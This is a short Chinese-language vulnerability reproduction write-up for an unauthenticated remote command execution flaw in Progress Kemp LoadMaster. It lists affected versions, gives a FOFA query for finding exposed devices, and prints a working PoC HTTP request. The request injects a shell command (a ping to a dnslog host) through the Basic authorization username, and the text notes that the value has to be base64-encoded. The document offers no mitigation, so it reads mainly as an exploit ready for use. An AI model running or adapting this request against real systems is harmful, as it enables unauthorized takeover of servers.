0x01 产品简介
Progress Kemp LoadMaster是一款负载均衡和应用交付控制器,由Progress Software Corporation(前身为Kemp Technologies)开发和提供。该产品旨在提供高可用性、可靠性和性能优化的应用交付解决方案,帮助组织管理和优化其应用程序交付流量。
0x02 漏洞概述
Progress Kemp LoadMaster 存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞写入后门文件,执行任意命令,导致服务器被控。
0x03 影响范围
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
0x04 复现环境
FOFA:body=">LoadMaster</div>"
0x05 漏洞复现
PoC
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: your-ip
Authorization: Basic {{base64enc(';ping 1111.88odft.dnslog.cn;': tester)}}PS:命令需要base64加密
